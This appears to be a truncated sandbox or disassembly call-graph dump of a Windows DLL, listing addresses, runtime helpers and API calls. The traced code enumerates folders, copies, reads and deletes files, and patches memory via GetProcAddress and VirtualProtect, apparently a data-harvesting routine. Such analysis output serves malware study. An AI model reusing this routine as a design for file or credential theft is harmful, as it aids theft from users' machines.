API calls 6845->6847 6849 10006c5b 6847->6849 6849->6838 6854 100086e4 6850->6854 6853 10008a3e 43 API calls 6853->6845 6855 100054a7 __fassign 38 API calls 6854->6855 6856 10008704 MultiByteToWideChar 6855->6856 6858 10008742 6856->6858 6866 100087da 6856->6866 6859 10008763 ___scrt_fastfail 6858->6859 6862 100056d0 21 API calls 6858->6862 6861 100087d4 6859->6861 6865 100087a8 MultiByteToWideChar 6859->6865 6860 10002ada _ValidateLocalCookies 5 API calls 6863 10006b66 6860->6863 6873 10008801 6861->6873 6862->6859 6868 10008a3e 6863->6868 6865->6861 6867 100087c4 GetStringTypeW 6865->6867 6866->6860 6867->6861 6869 100054a7 __fassign 38 API calls 6868->6869 6870 10008a51 6869->6870 6877 10008821 6870->6877 6874 1000880d 6873->6874 6875 1000881e 6873->6875 6874->6875 6876 1000571e _free 20 API calls 6874->6876 6875->6866 6876->6875 6878 1000883c 6877->6878 6879 10008862 MultiByteToWideChar 6878->6879 6880 10008a16 6879->6880 6881 1000888c 6879->6881 6882 10002ada _ValidateLocalCookies 5 API calls 6880->6882 6886 100056d0 21 API calls 6881->6886 6888 100088ad 6881->6888 6883 10006b87 6882->6883 6883->6853 6884 100088f6 MultiByteToWideChar 6885 10008962 6884->6885 6887 1000890f 6884->6887 6890 10008801 __freea 20 API calls 6885->6890 6886->6888 6904 10005f19 6887->6904 6888->6884 6888->6885 6890->6880 6892 10008971 6894 100056d0 21 API calls 6892->6894 6898 10008992 6892->6898 6893 10008939 6893->6885 6895 10005f19 11 API calls 6893->6895 6894->6898 6895->6885 6896 10008a07 6897 10008801 __freea 20 API calls 6896->6897 6897->6885 6898->6896 6899 10005f19 11 API calls 6898->6899 6900 100089e6 6899->6900 6900->6896 6901 100089f5 WideCharToMultiByte 6900->6901 6901->6896 6902 10008a35 6901->6902 6903 10008801 __freea 20 API calls 6902->6903 6903->6885 6905 10005c45 _free 5 API calls 6904->6905 6906 10005f40 6905->6906 6909 10005f49 6906->6909 6912 10005fa1 6906->6912 6910 10002ada _ValidateLocalCookies 5 API calls 6909->6910 6911 10005f9b 6910->6911 6911->6885 6911->6892 6911->6893 6913 10005c45 _free 5 API calls 6912->6913 6914 10005fc8 6913->6914 6915 10002ada _ValidateLocalCookies 5 API calls 6914->6915 6916 10005f89 LCMapStringW 6915->6916 6916->6909 6918 10006892 ___scrt_is_nonwritable_in_current_image 6917->6918 6925 10005671 RtlEnterCriticalSection 6918->6925 6920 1000689c 6926 100068f1 6920->6926 6924 100068b5 _abort 6924->6843 6925->6920 6938 10007011 6926->6938 6928 1000693f 6929 10007011 26 API calls 6928->6929 6930 1000695b 6929->6930 6931 10007011 26 API calls 6930->6931 6933 10006979 6931->6933 6932 100068a9 6935 100068bd 6932->6935 6933->6932 6934 1000571e _free 20 API calls 6933->6934 6934->6932 6952 100056b9 RtlLeaveCriticalSection 6935->6952 6937 100068c7 6937->6924 6939 10007022 6938->6939 6947 1000701e 6938->6947 6940 10007029 6939->6940 6944 1000703c ___scrt_fastfail 6939->6944 6941 10006368 _free 20 API calls 6940->6941 6942 1000702e 6941->6942 6943 100062ac _abort 26 API calls 6942->6943 6943->6947 6945 10007073 6944->6945 6946 1000706a 6944->6946 6944->6947 6945->6947 6949 10006368 _free 20 API calls 6945->6949 6948 10006368 _free 20 API calls 6946->6948 6947->6928 6950 1000706f 6948->6950 6949->6950 6951 100062ac _abort 26 API calls 6950->6951 6951->6947 6952->6937 6953 1000508a 6954 1000509c 6953->6954 6956 100050a2 6953->6956 6955 10005000 20 API calls 6954->6955 6955->6956 6120 1000220c 6121 10002215 6120->6121 6122 1000221a dllmain_dispatch 6120->6122 6124 100022b1 6121->6124 6125 100022c7 6124->6125 6127 100022d0 6125->6127 6128 10002264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6125->6128 6127->6122 6128->6127 6675 1000724e GetProcessHeap 6676 1000284f 6677 10002882 std::exception::exception 27 API calls 6676->6677 6678 1000285d 6677->6678 6957 10003c90 RtlUnwind 6978 100036d0 6979 100036e2 6978->6979 6981 100036f0 @_EH4_CallFilterFunc@8 6978->6981 6980 10002ada _ValidateLocalCookies 5 API calls 6979->6980 6980->6981 7647 10005351 7648 10005360 7647->7648 7649 10005374 7647->7649 7648->7649 7652 1000571e _free 20 API calls 7648->7652 7650 1000571e _free 20 API calls 7649->7650 7651 10005386 7650->7651 7653 1000571e _free 20 API calls 7651->7653 7652->7649 7654 10005399 7653->7654 7655 1000571e _free 20 API calls 7654->7655 7656 100053aa 7655->7656 7657 1000571e _free 20 API calls 7656->7657 7658 100053bb 7657->7658 7764 100073d5 7765 100073e1 ___scrt_is_nonwritable_in_current_image 7764->7765 7776 10005671 RtlEnterCriticalSection 7765->7776 7767 100073e8 7768 10008be3 27 API calls 7767->7768 7769 100073f7 7768->7769 7775 10007406 7769->7775 7777 10007269 GetStartupInfoW 7769->7777 7773 10007417 _abort 7788 10007422 7775->7788 7776->7767 7778 10007286 7777->7778 7779 10007318 7777->7779 7778->7779 7780 10008be3 27 API calls 7778->7780 7783 1000731f 7779->7783 7782 100072af 7780->7782 7781 100072dd GetFileType 7781->7782 7782->7779 7782->7781 7784 10007326 7783->7784 7785 10007369 GetStdHandle 7784->7785 7786 100073d1 7784->7786 7787 1000737c GetFileType 7784->7787 7785->7784 7786->7775 7787->7784 7791 100056b9 RtlLeaveCriticalSection 7788->7791 7790 10007429 7790->7773 7791->7790 6982 10004ed7 6983 10006d60 51 API calls 6982->6983 6984 10004ee9 6983->6984 6993 10007153 GetEnvironmentStringsW 6984->6993 6988 1000571e _free 20 API calls 6990 10004f29 6988->6990 6989 10004eff 6991 1000571e _free 20 API calls 6989->6991 6992 10004ef4 6991->6992 6992->6988 6994 100071bd 6993->6994 6995 1000716a 6993->6995 6996 100071c6 FreeEnvironmentStringsW 6994->6996 6997 10004eee 6994->6997 6998 10007170 WideCharToMultiByte 6995->6998 6996->6997 6997->6992 7005 10004f2f 6997->7005 6998->6994 6999 1000718c 6998->6999 7000 100056d0 21 API calls 6999->7000 7001 10007192 7000->7001 7002 100071af 7001->7002 7003 10007199 WideCharToMultiByte 7001->7003 7004 1000571e _free 20 API calls 7002->7004 7003->7002 7004->6994 7006 10004f44 7005->7006 7007 1000637b _free 20 API calls 7006->7007 7017 10004f6b 7007->7017 7008 10004fcf 7009 1000571e _free 20 API calls 7008->7009 7010 10004fe9 7009->7010 7010->6989 7011 1000637b _free 20 API calls 7011->7017 7012 10004fd1 7013 10005000 20 API calls 7012->7013 7015 10004fd7 7013->7015 7014 1000544d ___std_exception_copy 26 API calls 7014->7017 7016 1000571e _free 20 API calls 7015->7016 7016->7008 7017->7008 7017->7011 7017->7012 7017->7014 7018 10004ff3 7017->7018 7020 1000571e _free 20 API calls 7017->7020 7019 100062bc _abort 11 API calls 7018->7019 7021 10004fff 7019->7021 7020->7017 6129 10002418 6130 10002420 ___scrt_release_startup_lock 6129->6130 6133 100047f5 6130->6133 6132 10002448 6134 10004804 6133->6134 6135 10004808 6133->6135 6134->6132 6138 10004815 6135->6138 6139 10005b7a _free 20 API calls 6138->6139 6142 1000482c 6139->6142 6140 10002ada _ValidateLocalCookies 5 API calls 6141 10004811 6140->6141 6141->6132 6142->6140 6958 10004a9a 6961 10005411 6958->6961 6962 1000541d _abort 6961->6962 6963 10005af6 _abort 38 API calls 6962->6963 6966 10005422 6963->6966 6964 100055a8 _abort 38 API calls 6965 1000544c 6964->6965 6966->6964 5894 10001c5b 5895 10001c6b ___scrt_fastfail 5894->5895 5898 100012ee 5895->5898 5897 10001c87 5899 10001324 ___scrt_fastfail 5898->5899 5900 100013b7 GetEnvironmentVariableW 5899->5900 5924 100010f1 5900->5924 5903 100010f1 57 API calls 5904 10001465 5903->5904 5905 100010f1 57 API calls 5904->5905 5906 10001479 5905->5906 5907 100010f1 57 API calls 5906->5907 5908 1000148d 5907->5908 5909 100010f1 57 API calls 5908->5909 5910 100014a1 5909->5910 5911 100010f1 57 API calls 5910->5911 5912 100014b5 lstrlenW 5911->5912 5913 100014d9 lstrlenW 5912->5913 5923 100014d2 5912->5923 5914 100010f1 57 API calls 5913->5914 5915 10001501 lstrlenW lstrcatW 5914->5915 5916 100010f1 57 API calls 5915->5916 5917 10001539 lstrlenW lstrcatW 5916->5917 5918 100010f1 57 API calls 5917->5918 5919 1000156b lstrlenW lstrcatW 5918->5919 5920 100010f1 57 API calls 5919->5920 5921 1000159d lstrlenW lstrcatW 5920->5921 5922 100010f1 57 API calls 5921->5922 5922->5923 5923->5897 5925 10001118 ___scrt_fastfail 5924->5925 5926 10001129 lstrlenW 5925->5926 5937 10002c40 5926->5937 5928 10001148 lstrcatW lstrlenW 5929 10001177 lstrlenW FindFirstFileW 5928->5929 5930 10001168 lstrlenW 5928->5930 5931 100011a0 5929->5931 5932 100011e1 5929->5932 5930->5929 5933 100011c7 FindNextFileW 5931->5933 5934 100011aa 5931->5934 5932->5903 5933->5931 5936 100011da FindClose 5933->5936 5934->5933 5939 10001000 5934->5939 5936->5932 5938 10002c57 5937->5938 5938->5928 5938->5938 5940 10001022 ___scrt_fastfail 5939->5940 5941 100010af 5940->5941 5942 1000102f lstrcatW lstrlenW 5940->5942 5945 100010b5 lstrlenW 5941->5945 5955 100010ad 5941->5955 5943 1000105a lstrlenW 5942->5943 5944 1000106b lstrlenW 5942->5944 5943->5944 5956 10001e89 lstrlenW 5944->5956 5970 10001e16 5945->5970 5948 10001088 GetFileAttributesW 5951 1000109c 5948->5951 5948->5955 5949 100010ca 5950 10001e89 5 API calls 5949->5950 5949->5955 5952 100010df 5950->5952 5951->5955 5962 1000173a 5951->5962 5975 100011ea 5952->5975 5955->5934 5957 10002c40 ___scrt_fastfail 5956->5957 5958 10001ea7 lstrcatW lstrlenW 5957->5958 5959 10001ed1 lstrcatW 5958->5959 5960 10001ec2 5958->5960 5959->5948 5960->5959 5961 10001ec7 lstrlenW 5960->5961 5961->5959 5963 10001747 ___scrt_fastfail 5962->5963 5990 10001cca 5963->5990 5966 1000199f 5966->5955 5968 10001824 ___scrt_fastfail _strlen 5968->5966 6010 100015da 5968->6010 5971 10001e29 5970->5971 5972 10001e4c 5970->5972 5971->5972 5973 10001e2d lstrlenW 5971->5973 5972->5949 5973->5972 5974 10001e3f lstrlenW 5973->5974 5974->5972 5976 1000120e ___scrt_fastfail 5975->5976 5977 10001e89 5 API calls 5976->5977 5978 10001220 GetFileAttributesW 5977->5978 5979 10001235 5978->5979 5980 10001246 5978->5980 5979->5980 5982 1000173a 35 API calls 5979->5982 5981 10001e89 5 API calls 5980->5981 5983 10001258 5981->5983 5982->5980 5984 100010f1 56 API calls 5983->5984 5985 1000126d 5984->5985 5986 10001e89 5 API calls 5985->5986 5987 1000127f ___scrt_fastfail 5986->5987 5988 100010f1 56 API calls 5987->5988 5989 100012e6 5988->5989 5989->5955 5991 10001cf1 ___scrt_fastfail 5990->5991 5992 10001d0f CopyFileW CreateFileW 5991->5992 5993 10001d44 DeleteFileW 5992->5993 5994 10001d55 GetFileSize 5992->5994 5999 10001808 5993->5999 5995 10001ede 22 API calls 5994->5995 5996 10001d66 ReadFile 5995->5996 5997 10001d94 CloseHandle DeleteFileW 5996->5997 5998 10001d7d CloseHandle DeleteFileW 5996->5998 5997->5999 5998->5999 5999->5966 6000 10001ede 5999->6000 6002 1000222f 6000->6002 6003 1000224e 6002->6003 6005 10002250 6002->6005 6018 1000474f 6002->6018 6023 100047e5 6002->6023 6003->5968 6009 10002908 6005->6009 6030 100035d2 6005->6030 6006 100035d2 __CxxThrowException@8 RaiseException 6008 10002925 6006->6008 6008->5968 6009->6006 6011 1000160c _strcat _strlen 6010->6011 6012 1000163c lstrlenW 6011->6012 6118 10001c9d 6012->6118 6014 10001655 lstrcatW lstrlenW 6015 10001678 6014->6015 6016 10001693 ___scrt_fastfail 6015->6016 6017 1000167e lstrcatW 6015->6017 6016->5968 6017->6016 6033 10004793 6018->6033 6021 1000478f 6021->6002 6022 10004765 6039 10002ada 6022->6039 6028 100056d0 _free 6023->6028 6024 1000570e 6052 10006368 6024->6052 6025 100056f9 RtlAllocateHeap 6027 1000570c 6025->6027 6025->6028 6027->6002 6028->6024 6028->6025 6029 1000474f _free 7 API calls 6028->6029 6029->6028 6032 100035f2 RaiseException 6030->6032 6032->6009 6034 1000479f ___scrt_is_nonwritable_in_current_image 6033->6034 6046 10005671 RtlEnterCriticalSection 6034->6046 6036 100047aa 6047 100047dc 6036->6047 6038 100047d1 _abort 6038->6022 6040 10002ae3 6039->6040 6041 10002ae5 IsProcessorFeaturePresent 6039->6041 6040->6021 6043 10002b58 6041->6043 6051 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6043->6051 6045 10002c3b 6045->6021 6046->6036 6050 100056b9 RtlLeaveCriticalSection 6047->6050 6049 100047e3 6049->6038 6050->6049 6051->6045 6055 10005b7a GetLastError 6052->6055 6056 10005b93 6055->6056 6057 10005b99 6055->6057 6074 10005e08 6056->6074 6061 10005bf0 SetLastError 6057->6061 6081 1000637b 6057->6081 6063 10005bf9 6061->6063 6062 10005bb3 6088 1000571e 6062->6088 6063->6027 6067 10005bb9 6069 10005be7 SetLastError 6067->6069 6068 10005bcf 6101 1000593c 6068->6101 6069->6063 6072 1000571e _free 17 API calls 6073 10005be0 6072->6073 6073->6061 6073->6069 6106 10005c45 6074->6106 6076 10005e2f 6077 10005e47 TlsGetValue 6076->6077 6080 10005e3b 6076->6080 6077->6080 6078 10002ada _ValidateLocalCookies 5 API calls 6079 10005e58 6078->6079 6079->6057 6080->6078 6086 10006388 _free 6081->6086 6082 100063c8 6084 10006368 _free 19 API calls 6082->6084 6083 100063b3 RtlAllocateHeap 6085 10005bab 6083->6085 6083->6086 6084->6085 6085->6062 6094 10005e5e 6085->6094 6086->6082 6086->6083 6087 1000474f _free 7 API calls 6086->6087 6087->6086 6089 10005752 _free 6088->6089 6090 10005729 HeapFree 6088->6090 6089->6067 6090->6089 6091 1000573e 6090->6091 6092 10006368 _free 18 API calls 6091->6092 6093 10005744 GetLastError 6092->6093 6093->6089 6095 10005c45 _free 5 API calls 6094->6095 6096 10005e85 6095->6096 6097 10005ea0 TlsSetValue 6096->6097 6100 10005e94 6096->6100 6097->6100 6098 10002ada _ValidateLocalCookies 5 API calls 6099 10005bc8 6098->6099 6099->6062 6099->6068 6100->6098 6112 10005914 6101->6112 6107 10005c71 6106->6107 6108 10005c75 __crt_fast_encode_pointer 6106->6108 6107->6108 6109 10005ce1 _free LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6107->6109 6111 10005c95 6107->6111 6108->6076 6109->6107 6110 10005ca1 GetProcAddress 6110->6108 6111->6108 6111->6110 6113 10005854 _free RtlEnterCriticalSection RtlLeaveCriticalSection 6112->6113 6114 10005938 6113->6114 6115 100058c4 6114->6115 6116 10005758 _free 20 API calls 6115->6116 6117 100058e8 6116->6117 6117->6072 6119 10001ca6 _strlen 6118->6119 6119->6014 7022 100020db 7024 100020e7 ___scrt_is_nonwritable_in_current_image 7022->7024 7023 10002110 dllmain_raw 7025 1000212a 7023->7025 7033 100020f6 7023->7033 7024->7023 7029 1000210b 7024->7029 7024->7033 7035 10001eec 7025->7035 7027 10002177 7028 10001eec 31 API calls 7027->7028 7027->7033 7030 1000218a 7028->7030 7029->7027 7032 10001eec 31 API calls 7029->7032 7029->7033 7031 10002193 dllmain_raw 7030->7031 7030->7033 7031->7033 7034 1000216d dllmain_raw 7032->7034 7034->7027 7036 10001ef7 7035->7036 7037 10001f2a dllmain_crt_process_detach 7035->7037 7038 10001f1c dllmain_crt_process_attach 7036->7038 7039 10001efc 7036->7039 7044 10001f06 7037->7044 7038->7044 7040 10001f01 7039->7040 7041 10001f12 7039->7041 7040->7044 7045 1000240b 7040->7045 7050 100023ec 7041->7050 7044->7029 7058 100053e5 7045->7058 7156 10003513 7050->7156 7053 100023f5 7053->7044 7056 10002408 7056->7044 7057 1000351e 7 API calls 7057->7053 7064 10005aca 7058->7064 7061 1000351e 7140 10003820 7061->7140 7063 10002415 7063->7044 7065 10005ad4 7064->7065 7068 10002410 7064->7068 7066 10005e08 _free 11 API calls 7065->7066 7067 10005adb 7066->7067 7067->7068 7069 10005e5e _free 11 API calls 7067->7069 7068->7061 7070 10005aee 7069->7070 7072 100059b5 7070->7072 7073 100059c0 7072->7073 7074 100059d0 7072->7074 7078 100059d6 7073->7078 7074->7068 7077 1000571e _free 20 API calls 7077->7074 7079 100059ef 7078->7079 7080 100059e9 7078->7080 7082 1000571e _free 20 API calls 7079->7082 7081 1000571e _free 20 API calls 7080->7081 7081->7079 7083 100059fb 7082->7083 7084 1000571e _free 20 API calls 7083->7084 7085 10005a06 7084->7085 7086 1000571e _free 20 API calls 7085->7086 7087 10005a11 7086->7087 7088 1000571e _free 20 API calls 7087->7088 7089 10005a1c 7088->7089 7090 1000571e _free 20 API calls 7089->7090 7091 10005a27 7090->7091 7092 1000571e _free 20 API calls 7091->7092 7093 10005a32 7092->7093 7094 1000571e _free 20 API calls 7093->7094 7095 10005a3d 7094->7095 7096 1000571e _free 20 API calls 7095->7096 7097 10005a48 7096->7097 7098 1000571e _free 20 API calls 7097->7098 7099 10005a56 7098->7099 7104 1000589c 7099->7104 7110 100057a8 7104->7110 7106 100058c0 7107 100058ec 7106->7107 7123 10005809 7107->7123 7109 10005910 7109->7077 7111 100057b4 ___scrt_is_nonwritable_in_current_image 7110->7111 7118 10005671 RtlEnterCriticalSection 7111->7118 7114 100057be 7115 1000571e _free 20 API calls 7114->7115 7117 100057e8 7114->7117 7115->7117 7116 100057f5 _abort 7116->7106 7119 100057fd 7117->7119 7118->7114 7122 100056b9 RtlLeaveCriticalSection 7119->7122 7121 10005807 7121->7116 7122->7121 7124 10005815 ___scrt_is_nonwritable_in_current_image 7123->7124 7131 10005671 RtlEnterCriticalSection 7124->7131 7126 1000581f 7132 10005a7f 7126->7132 7128 10005832 7136 10005848 7128->7136 7130 10005840 _abort 7130->7109 7131->7126 7133 10005ab5 __fassign 7132->7133 7134 10005a8e __fassign 7132->7134 7133->7128 7134->7133 7135 10007cc2 __fassign 20 API calls 7134->7135 7135->7133 7139 100056b9 RtlLeaveCriticalSection 7136->7139 7138 10005852 7138->7130 7139->7138 7141 1000382d 7140->7141 7145 1000384b ___vcrt_freefls@4 7140->7145 7142 1000383b 7141->7142 7146 10003b67 7141->7146 7151 10003ba2 7142->7151 7145->7063 7147 10003a82 try_get_function 5 API calls 7146->7147 7148 10003b81 7147->7148 7149 10003b99 TlsGetValue 7148->7149 7150 10003b8d 7148->7150 7149->7150 7150->7142 7152 10003a82 try_get_function 5 API calls 7151->7152 7153 10003bbc 7152->7153 7154 10003bd7 TlsSetValue 7153->7154 7155 10003bcb 7153->7155 7154->7155 7155->7145 7162 10003856 7156->7162 7158 100023f1 7158->7053 7159 100053da 7158->7159 7160 10005b7a _free 20 API calls 7159->7160 7161 100023fd 7160->7161 7161->7056 7161->7057 7163 10003862 GetLastError 7162->7163 7164 1000385f 7162->7164 7165 10003b67 ___vcrt_FlsGetValue 6 API calls 7163->7165 7164->7158 7166 10003877 7165->7166 7167 100038dc SetLastError 7166->7167 7168 10003ba2 ___vcrt_FlsSetValue 6 API calls 7166->7168 7173 10003896 7166->7173 7167->7158 7169 10003890 7168->7169 7170 100038b8 7169->7170 7171 10003ba2 ___vcrt_FlsSetValue 6 API calls 7169->7171 7169->7173 7172 10003ba2 ___vcrt_FlsSetValue 6 API calls 7170->7172 7170->7173 7171->7170 7172->7173 7173->7167 6143 1000281c 6146 10002882 6143->6146 6149 10003550 6146->6149 6148 1000282a 6150 1000355d 6149->6150 6153 1000358a 6149->6153 6151 100047e5 ___std_exception_copy 21 API calls 6150->6151 6150->6153 6152 1000357a 6151->6152 6152->6153 6155 1000544d 6152->6155 6153->6148 6156 1000545a 6155->6156 6157 10005468 6155->6157 6156->6157 6162 1000547f 6156->6162 6158 10006368 _free 20 API calls 6157->6158 6159 10005470 6158->6159 6164 100062ac 6159->6164 6161 1000547a 6161->6153 6162->6161 6163 10006368 _free 20 API calls 6162->6163 6163->6159 6167 10006231 6164->6167 6166 100062b8 6166->6161 6168 10005b7a _free 20 API calls 6167->6168 6169 10006247 6168->6169 6170 10006255 6169->6170 6171 100062a6 6169->6171 6175 10002ada _ValidateLocalCookies 5 API calls 6170->6175 6178 100062bc IsProcessorFeaturePresent 6171->6178 6173 100062ab 6174 10006231 _abort 26 API calls 6173->6174 6176 100062b8 6174->6176 6177 1000627c 6175->6177 6176->6166 6177->6166 6179 100062c7 6178->6179 6182 100060e2 6179->6182 6183 100060fe ___scrt_fastfail 6182->6183 6184 1000612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6183->6184 6187 100061fb ___scrt_fastfail 6184->6187 6185 10002ada _ValidateLocalCookies 5 API calls 6186 10006219 GetCurrentProcess TerminateProcess 6185->6186 6186->6173 6187->6185 7792 10004bdd 7793 10004c08 7792->7793 7794 10004bec 7792->7794 7796 10006d60 51 API calls 7793->7796 7794->7793 7795 10004bf2 7794->7795 7797 10006368 _free 20 API calls 7795->7797 7798 10004c0f GetModuleFileNameA 7796->7798 7799 10004bf7 7797->7799 7800 10004c33 7798->7800 7801 100062ac _abort 26 API calls 7799->7801 7815 10004d01 7800->7815 7812 10004c01 7801->7812 7806 10004c72 7809 10004d01 38 API calls 7806->7809 7807 10004c66 7808 10006368 _free 20 API calls 7807->7808 7814 10004c6b 7808->7814 7811 10004c88 7809->7811 7810 1000571e _free 20 API calls 7810->7812 7813 1000571e _free 20 API calls 7811->7813 7811->7814 7813->7814 7814->7810 7817 10004d26 7815->7817 7819 10004d86 7817->7819 7827 100070eb 7817->7827 7818 10004c50 7821 10004e76 7818->7821 7819->7818 7820 100070eb 38 API calls 7819->7820 7820->7819 7822 10004e8b 7821->7822 7823 10004c5d 7821->7823 7822->7823 7824 1000637b _free 20 API calls 7822->7824 7823->7806 7823->7807 7825 10004eb9 7824->7825 7826 1000571e _free 20 API calls 7825->7826 7826->7823 7830 10007092 7827->7830 7831 100054a7 __fassign 38 API calls 7830->7831 7832 100070a6 7831->7832 7832->7817 6679 10007260 GetStartupInfoW 6680 10007286 6679->6680 6681 10007318 6679->6681 6680->6681 6685 10008be3 6680->6685 6683 100072af 6683->6681 6684 100072dd GetFileType 6683->6684 6684->6683 6686 10008bef ___scrt_is_nonwritable_in_current_image 6685->6686 6687 10008c13 6686->6687 6688 10008bfc 6686->6688 6698 10005671 RtlEnterCriticalSection 6687->6698 6689 10006368 _free 20 API calls 6688->6689 6691 10008c01 6689->6691 6692 100062ac _abort 26 API calls 6691->6692 6693 10008c0b _abort 6692->6693 6693->6683 6694 10008c4b 6706 10008c72 6694->6706 6696 10008c1f 6696->6694 6699 10008b34 6696->6699 6698->6696 6700 1000637b _free 20 API calls 6699->6700 6702 10008b46 6700->6702 6701 10008b53 6703 1000571e _free 20 API calls 6701->6703 6702->6701 6704 10005eb7 11 API calls 6702->6704 6705 10008ba5 6703->6705 6704->6702 6705->6696 6709 100056b9 RtlLeaveCriticalSection 6706->6709 6708 10008c79 6708->6693 6709->6708 7687 100081a0 7688 100081d9 7687->7688 7689 100081dd 7688->7689 7700 10008205 7688->7700 7690 10006368 _free 20 API calls 7689->7690 7692 100081e2 7690->7692 7691 10008529 7693 10002ada _ValidateLocalCookies 5 API calls 7691->7693 7694 100062ac _abort 26 API calls 7692->7694 7696 10008536 7693->7696 7695 100081ed 7694->7695 7697 10002ada _ValidateLocalCookies 5 API calls 7695->7697 7698 100081f9 7697->7698 7700->7691 7701 100080c0 7700->7701 7704 100080db 7701->7704 7702 10002ada _ValidateLocalCookies 5 API calls 7703 10008152 7702->7703 7703->7700 7704->7702 7833 1000a1e0 7836 1000a1fe 7833->7836 7835 1000a1f6 7837 1000a203 7836->7837 7838 1000aa53 21 API calls 7837->7838 7840 1000a298 7837->7840 7839 1000a42f 7838->7839 7839->7835 7840->7835 7659 10009d61 7660 10009d81 7659->7660 7663 10009db8 7660->7663 7662 10009dab 7664 10009dbf 7663->7664 7665 10009e20 7664->7665 7669 10009ddf 7664->7669 7666 1000aa17 21 API calls 7665->7666 7667 1000a90e 7665->7667 7668 10009e6e 7666->7668 7667->7662 7668->7662 7669->7667 7670 1000aa17 21 API calls 7669->7670 7671 1000a93e 7670->7671 7671->7662 7705 100021a1 ___scrt_dllmain_exception_filter 5862 1000c7a7 5863 1000c7be 5862->5863 5867 1000c82c 5862->5867 5863->5867 5874 1000c7e6 GetModuleHandleA 5863->5874 5865 1000c835 GetModuleHandleA 5868 1000c83f 5865->5868 5866 1000c872 5867->5865 5867->5866 5867->5868 5868->5867 5869 1000c85f GetProcAddress 5868->5869 5869->5867 5870 1000c7dd 5870->5867 5870->5868 5871 1000c800 GetProcAddress 5870->5871 5871->5867 5872 1000c80d VirtualProtect 5871->5872 5872->5867 5873 1000c81c VirtualProtect 5872->5873 5873->5867 5875 1000c7ef 5874->5875 5883 1000c82c 5874->5883 5886 1000c803 GetProcAddress 5875->5886 5877 1000c835 GetModuleHandleA 5882 1000c83f 5877->5882 5878 1000c7f4 5880 1000c800 GetProcAddress 5878->5880 5878->5883 5879 1000c872 5881 1000c80d VirtualProtect 5880->5881 5880->5883 5881->5883 5884 1000c81c VirtualProtect 5881->5884 5882->5883 5885 1000c85f GetProcAddress 5882->5885 5883->5877 5883->5879 5883->5882 5884->5883 5885->5883 5887 1000c82c 5886->5887 5888 1000c80d VirtualProtect 5886->5888 5890 1000c872 5887->5890 5891 1000c835 GetModuleHandleA 5887->5891 5888->5887 5889 1000c81c VirtualProtect 5888->5889 5889->5887 5893 1000c83f 5891->5893 5892 1000c85f GetProcAddress 5892->5893 5893->5887 5893->5892 6188 1000742b 6189 10007430 6188->6189 6191 10007453 6189->6191 6192 10008bae 6189->6192 6193 10008bdd 6192->6193 6194 10008bbb 6192->6194 6193->6189 6195 10008bd7 6194->6195 6196 10008bc9 RtlDeleteCriticalSection 6194->6196 6197 1000571e _free 20 API calls 6195->6197 6196->6195 6196->6196 6197->6193 6710 1000ac6b 6711 1000ac84 __startOneArgErrorHandling 6710->6711 6713 1000acad __startOneArgErrorHandling 6711->6713 6714 1000b2f0 6711->6714 6715 1000b329 __startOneArgErrorHandling 6714->6715 6717 1000b350 __startOneArgErrorHandling 6715->6717 6725 1000b5c1 6715->6725 6718 1000b393 6717->6718 6719 1000b36e 6717->6719 6738 1000b8b2 6718->6738 6729 1000b8e1 6719->6729 6722 1000b38e __startOneArgErrorHandling 6723 10002ada _ValidateLocalCookies 5 API calls 6722->6723 6724 1000b3b7 6723->6724 6724->6713 6726 1000b5ec __raise_exc 6725->6726 6727 1000b7e5 RaiseException 6726->6727 6728 1000b7fd 6727->6728 6728->6717 6730 1000b8f0 6729->6730 6731 1000b964 __startOneArgErrorHandling 6730->6731 6732 1000b90f __startOneArgErrorHandling 6730->6732 6734 1000b8b2 __startOneArgErrorHandling 20 API calls 6731->6734 6745 100078a3 6732->6745 6737 1000b95d 6734->6737 6736 1000b8b2 __startOneArgErrorHandling 20 API calls 6736->6737 6737->6722 6739 1000b8d4 6738->6739 6740 1000b8bf 6738->6740 6742 10006368 _free 20 API calls 6739->6742 6741 1000b8d9 6740->6741 6743 10006368 _free 20 API calls 6740->6743 6741->6722 6742->6741 6744 1000b8cc 6743->6744 6744->6722 6746 100078cb 6745->6746 6747 10002ada _ValidateLocalCookies 5 API calls 6746->6747 6748 100078e8 6747->6748 6748->6736 6748->6737 6967 100060ac 6968 100060dd 6967->6968 6970 100060b7 6967->6970 6969 100060c7 FreeLibrary 6969->6970 6970->6968 6970->6969 6749 1000506f 6750 10005081 6749->6750 6751 10005087 6749->6751 6753 10005000 6750->6753 6754 1000502a 6753->6754 6755 1000500d 6753->6755 6754->6751 6756 10005024 6755->6756 6757 1000571e _free 20 API calls 6755->6757 6758 1000571e _free 20 API calls 6756->6758 6757->6755 6758->6754 6198 10005630 6199 1000563b 6198->6199 6201 10005664 6199->6201 6202 10005660 6199->6202 6204 10005eb7 6199->6204 6211 10005688 6201->6211 6205 10005c45 _free 5 API calls 6204->6205 6206 10005ede 6205->6206 6207 10005efc InitializeCriticalSectionAndSpinCount 6206->6207 6208 10005ee7 6206->6208 6207->6208 6209 10002ada _ValidateLocalCookies 5 API calls 6208->6209 6210 10005f13 6209->6210 6210->6199 6212 100056b4 6211->6212 6213 10005695 6211->6213 6212->6202 6214 1000569f RtlDeleteCriticalSection 6213->6214 6214->6212 6214->6214 7672 10003370 7683 10003330 7672->7683 7684 10003342 7683->7684 7685 1000334f 7683->7685 7686 10002ada _ValidateLocalCookies 5 API calls 7684->7686 7686->7685 7841 100063f0 7842 10006400 7841->7842 7851 10006416 7841->7851 7843 10006368 _free 20 API calls 7842->7843 7844 10006405 7843->7844 7845 100062ac _abort 26 API calls 7844->7845 7847 1000640f 7845->7847 7846 10004e76 20 API calls 7853 100064e5 7846->7853 7848 10006480 7848->7846 7848->7848 7850 100064ee 7852 1000571e _free 20 API calls 7850->7852 7851->7848 7854 10006561 7851->7854 7860 10006580 7851->7860 7852->7854 7853->7850 7857 10006573 7853->7857 7871 100085eb 7853->7871 7880 1000679a 7854->7880 7858 100062bc _abort 11 API calls 7857->7858 7859 1000657f 7858->7859 7861 1000658c 7860->7861 7861->7861 7862 1000637b _free 20 API calls 7861->7862 7863 100065ba 7862->7863 7864 100085eb 26 API calls 7863->7864 7865 100065e6 7864->7865 7866 100062bc _abort 11 API calls 7865->7866 7867 10006615 ___scrt_fastfail 7866->7867 7868 100066b6 FindFirstFileExA 7867->7868 7869 10006705 7868->7869 7870 